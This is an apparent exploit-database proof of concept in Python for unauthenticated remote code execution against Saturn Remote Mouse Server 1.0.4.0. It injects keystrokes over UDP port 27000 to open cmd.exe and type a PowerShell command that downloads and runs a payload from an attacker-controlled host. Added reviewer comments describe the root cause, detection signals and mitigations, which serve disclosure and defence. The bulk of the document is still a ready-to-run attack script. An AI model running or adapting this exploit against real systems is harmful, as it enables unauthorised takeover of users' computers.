# Exploit Title: Saturn Remote Mouse Server 1.0.4.0 - Remote Code Execution
# Date: 27/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.saturnremote.com/
# Software Link: https://apps.microsoft.com/detail/9pcrbt6tm5v8?hl=en-US&gl=EN
# Version: 1.0.4.0
# Tested on: Windows 10

'''
Description:
Saturn Remote Mouse Server v1.0.4.0 exposes an unauthenticated UDP command
interface (port 27000) allowing remote attackers to inject keystrokes. This
PoC demonstrates RCE by simulating Windows key combinations to spawn cmd.exe
and execute malicious PowerShell payloads with user privileges.
'''

# Reviewer notes (root cause, detection, mitigation):
#   * Root cause as shown by this listing: every message below is a bare JSON
#     datagram. No credential, token or pairing value is sent, so the result
#     depends only on the server acting on whatever reaches UDP 27000.
#     Whether the product has an optional pairing/auth setting is not visible
#     from this page -- confirm against the vendor documentation.
#   * Network signal: a burst of small UDP datagrams to port 27000, each a
#     JSON object with a single "Key" field, sent roughly 0.15 s apart, from
#     a host that is not the user's paired phone.
#   * Host signal: cmd.exe starting powershell with an `iwr ... -OutFile`
#     into $env:TEMP immediately followed by `Start-Process` on that file.
#   * Mitigation: do not expose UDP 27000 beyond the device that needs it
#     (host firewall rule scoped to a known peer) and stop the server when it
#     is not in use. Input-injection services of this kind need an
#     authenticated session before accepting commands.

import socket
import json
import time

TARGET_IP = "192.168.8.105"
TARGET_PORT = 27000
LHOST = "192.168.8.100"
PAYLOAD = "shell.exe"


def _send_json(message, pause):
    """Send *message* as one JSON datagram to the target, then wait *pause* seconds.

    A new UDP socket is opened and closed for every message. UDP gives no
    acknowledgement, so a successful call says nothing about whether the
    server received or acted on the datagram.
    """
    datagram = json.dumps(message).encode()
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.sendto(datagram, (TARGET_IP, TARGET_PORT))
    udp.close()
    time.sleep(pause)


def send_keystroke(key):
    """Send a single ``{"Key": key}`` message, followed by a 0.15 s pause."""
    _send_json({"Key": key}, 0.15)


def open_start_menu():
    """Send the ``START`` command message, followed by a 1 s pause.

    The coordinate and area fields are all zero; the listing does not show
    how the server interprets them.
    """
    # Field order is kept as in the original message; json.dumps preserves it.
    message = {
        "X": 0,
        "CommandName": "START",
        "AreaHeight": 0,
        "Y": 0,
        "AreaWidth": 0,
    }
    _send_json(message, 1)


def type_string(text):
    """Send *text* one character at a time via ``send_keystroke``."""
    for ch in text:
        send_keystroke(ch)


# --- Script body: runs on execution, in this exact order --------------------

# Step 1: START command, then "cmd" + newline typed through the Key interface.
open_start_menu()
time.sleep(2)
type_string("cmd")
time.sleep(1)
send_keystroke("\n")
time.sleep(2)

# Step 2: the command line typed into that window. It is the host-side
# artifact to look for: powershell fetching a file over HTTP into $env:TEMP
# and starting it.
download_cmd = f"powershell -c \"iwr http://{LHOST}/{PAYLOAD} -OutFile $env:TEMP\\{PAYLOAD}; Start-Process $env:TEMP\\{PAYLOAD}\""
type_string(download_cmd)
time.sleep(1)
send_keystroke("\n")  # Execute

# The message below is printed unconditionally; nothing in the script checks
# that any datagram was received or that the command ran.
print("payload executed check your listener!")
time.sleep(3)

# Step 3: close the console window that was opened in step 1.
type_string("exit")
send_keystroke("\n")